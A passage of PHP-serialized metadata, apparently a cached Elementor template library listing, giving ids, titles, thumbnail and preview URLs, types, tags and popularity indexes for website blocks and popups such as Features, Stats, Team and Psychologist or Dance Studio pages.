1\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/09/Single-Post.png\";s:12:\"tmpl_created\";i:1600164087;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/psychologist-single-post-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:55;a:14:{s:2:\"id\";i:5963;s:5:\"title\";s:10:\"Features 7\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_2.png\";s:12:\"tmpl_created\";i:1520443626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:63;s:11:\"trend_index\";i:60;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:56;a:14:{s:2:\"id\";i:15251;s:5:\"title\";s:34:\"Psychologist &#8211; single post 2\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2020/09/Single-Service-Page.png\";s:12:\"tmpl_created\";i:1600165179;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/psychologist-single-post-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:57;a:14:{s:2:\"id\";i:5974;s:5:\"title\";s:10:\"Features 4\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_3.png\";s:12:\"tmpl_created\";i:1520443629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:62;s:11:\"trend_index\";i:103;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:58;a:14:{s:2:\"id\";i:15259;s:5:\"title\";s:31:\"Hello Bar | Menu | Psychologist\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Menu-PopUp.png\";s:12:\"tmpl_created\";i:1600170209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/hello-bar-menu-psychologist/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:59;a:14:{s:2:\"id\";i:5983;s:5:\"title\";s:10:\"Features 3\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_3.png\";s:12:\"tmpl_created\";i:1520443630;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:11:\"[\"featues\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:230;s:11:\"trend_index\";i:281;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:60;a:14:{s:2:\"id\";i:15272;s:5:\"title\";s:32:\"Classic | Contact | Psychologist\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/PopUp.png\";s:12:\"tmpl_created\";i:1600170487;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-contact-psychologist/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:61;a:14:{s:2:\"id\";i:5991;s:5:\"title\";s:11:\"Features 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_4.png\";s:12:\"tmpl_created\";i:1520443632;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:123;s:11:\"trend_index\";i:174;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:62;a:14:{s:2:\"id\";i:15414;s:5:\"title\";s:32:\"Classic | Contact | Dance Studio\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/PopUp.jpg\";s:12:\"tmpl_created\";i:1603180596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-contact-dance-studio/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"dance studio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:63;a:14:{s:2:\"id\";i:5999;s:5:\"title\";s:7:\"Team 14\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_10.png\";s:12:\"tmpl_created\";i:1520443634;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:89;s:11:\"trend_index\";i:135;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:64;a:14:{s:2:\"id\";i:10434;s:5:\"title\";s:27:\"Classic | Sale | Headphones\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/head_small.png\";s:12:\"tmpl_created\";i:1547961950;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:369;s:11:\"trend_index\";i:327;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:65;a:14:{s:2:\"id\";i:6008;s:5:\"title\";s:6:\"Team 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_10.png\";s:12:\"tmpl_created\";i:1520443636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:66;s:11:\"trend_index\";i:99;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:66;a:14:{s:2:\"id\";i:10444;s:5:\"title\";s:17:\"Classic | Contact\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/plant_small.png\";s:12:\"tmpl_created\";i:1547962029;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/popups/classic-contact-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:396;s:11:\"trend_index\";i:484;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:67;a:14:{s:2:\"id\";i:6027;s:5:\"title\";s:7:\"About 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1-1.png\";s:12:\"tmpl_created\";i:1520443639;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-5-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:39;s:11:\"trend_index\";i:49;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:68;a:14:{s:2:\"id\";i:6036;s:5:\"title\";s:7:\"About 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1-1.png\";s:12:\"tmpl_created\";i:1520443641;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-6-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:86;s:11:\"trend_index\";i:85;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:69;a:14:{s:2:\"id\";i:10467;s:5:\"title\";s:27:\"Bottom Bar | Contact | Lego\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/tro_small.png\";s:12:\"tmpl_created\";i:1547962277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/bottom-bar-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:669;s:11:\"trend_index\";i:694;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:70;a:14:{s:2:\"id\";i:6044;s:5:\"title\";s:11:\"Features 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_5.png\";s:12:\"tmpl_created\";i:1520443643;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:65;s:11:\"trend_index\";i:71;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:71;a:14:{s:2:\"id\";i:6053;s:5:\"title\";s:10:\"Features 1\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_5.png\";s:12:\"tmpl_created\";i:1520443645;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:168;s:11:\"trend_index\";i:205;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:72;a:14:{s:2:\"id\";i:10487;s:5:\"title\";s:18:\"Slide In | Contact\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/acc_small.png\";s:12:\"tmpl_created\";i:1547964527;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:520;s:11:\"trend_index\";i:503;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:73;a:14:{s:2:\"id\";i:6063;s:5:\"title\";s:7:\"Stats 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_2.png\";s:12:\"tmpl_created\";i:1520443647;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:161;s:11:\"trend_index\";i:257;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:74;a:14:{s:2:\"id\";i:10498;s:5:\"title\";s:14:\"Classic | Sale\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/pink_small-1.png\";s:12:\"tmpl_created\";i:1547964616;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:416;s:11:\"trend_index\";i:304;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:75;a:14:{s:2:\"id\";i:15407;s:5:\"title\";s:24:\"Dance Studio &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/10/404.jpg\";s:12:\"tmpl_created\";i:1603181958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/dance-studio-404/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:22:\"[\"404\",\"dance studio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:76;a:14:{s:2:\"id\";i:6071;s:5:\"title\";s:8:\"Stats 13\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_3.png\";s:12:\"tmpl_created\";i:1520443649;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:160;s:11:\"trend_index\";i:242;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:77;a:14:{s:2:\"id\";i:15400;s:5:\"title\";s:27:\"Dance Studio &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/10/Footer.jpg\";s:12:\"tmpl_created\";i:1603181989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/dance-studio-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:25:\"[\"dance studio\",\"footer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:78;a:14:{s:2:\"id\";i:6079;s:5:\"title\";s:7:\"Stats 3\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_4.png\";s:12:\"tmpl_created\";i:1520443651;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:269;s:11:\"trend_index\";i:350;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:79;a:14:{s:2:\"id\";i:10519;s:5:\"title\";s:27:\"Hello Bar | Promotion | App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/app_small-1.png\";s:12:\"tmpl_created\";i:1547964801;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/hello-bar-promotion-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:549;s:11:\"trend_index\";i:456;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:80;a:14:{s:2:\"id\";i:15391;s:5:\"title\";s:27:\"Dance Studio &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/10/Header.jpg\";s:12:\"tmpl_created\";i:1603182011;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/dance-studio-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:25:\"[\"dance studio\",\"header\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:81;a:14:{s:2:\"id\";i:6089;s:5:\"title\";s:7:\"Stats 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_5.png\";s:12:\"tmpl_created\";i:1520443653;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:183;s:11:\"trend_index\";i:292;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:82;a:14:{s:2:\"id\";i:6097;s:5:\"title\";s:7:\"Stats 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_2.png\";s:12:\"tmpl_created\";i:1520443655;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:262;s:11:\"trend_index\";i:209;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:83;a:14:{s:2:\"id\";i:6106;s:5:\"title\";s:7:\"Stats 2\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_6.png\";s:12:\"tmpl_created\";i:1520443657;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:337;s:11:\"trend_index\";i:443;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:84;a:14:{s:2:\"id\";i:6114;s:5:\"title\";s:7:\"Stats 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_6.png\";s:12:\"tmpl_created\";i:1520443659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:378;s:11:\"trend_index\";i:439;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:85;a:14:{s:2:\"id\";i:6122;s:5:\"title\";s:7:\"About 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2-1.png\";s:12:\"tmpl_created\";i:1520443661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:36;s:11:\"trend_index\";i:45;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:86;a:14:{s:2:\"id\";i:10569;s:5:\"title\";s:15:\"Slide In | Sale\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/off_small.png\";s:12:\"tmpl_created\";i:1547967812;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/popups/slide-in-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:501;s:11:\"trend_index\";i:556;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:87;a:14:{s:2:\"id\";i:6135;s:5:\"title\";s:8:\"About 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_2.png\";s:12:\"tmpl_created\";i:1520443663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:83;s:11:\"trend_index\";i:121;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:88;a:14:{s:2:\"id\";i:6144;s:5:\"title\";s:7:\"Team 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_11.png\";s:12:\"tmpl_created\";i:1520443664;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:155;s:11:\"trend_index\";i:277;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:89;a:14:{s:2:\"id\";i:10590;s:5:\"title\";s:19:\"Full Screen | Login\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/pass1_small.png\";s:12:\"tmpl_created\";i:1547967978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:470;s:11:\"trend_index\";i:411;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:90;a:14:{s:2:\"id\";i:6152;s:5:\"title\";s:7:\"Stats 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_1.png\";s:12:\"tmpl_created\";i:1520443666;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:241;s:11:\"trend_index\";i:233;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:91;a:14:{s:2:\"id\";i:10600;s:5:\"title\";s:18:\"Slide In | Contact\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/orange_small.png\";s:12:\"tmpl_created\";i:1547968080;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-contact-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:459;s:11:\"trend_index\";i:530;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:92;a:14:{s:2:\"id\";i:6162;s:5:\"title\";s:11:\"Services 31\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_1.png\";s:12:\"tmpl_created\";i:1520443668;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-31/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:339;s:11:\"trend_index\";i:430;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:93;a:14:{s:2:\"id\";i:6170;s:5:\"title\";s:8:\"Stats 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_2.png\";s:12:\"tmpl_created\";i:1520443670;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:332;s:11:\"trend_index\";i:419;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:94;a:14:{s:2:\"id\";i:10622;s:5:\"title\";s:34:\"Full Screen | Contact | Headphones\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/full_hear_small.png\";s:12:\"tmpl_created\";i:1547969678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/full-screen-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full 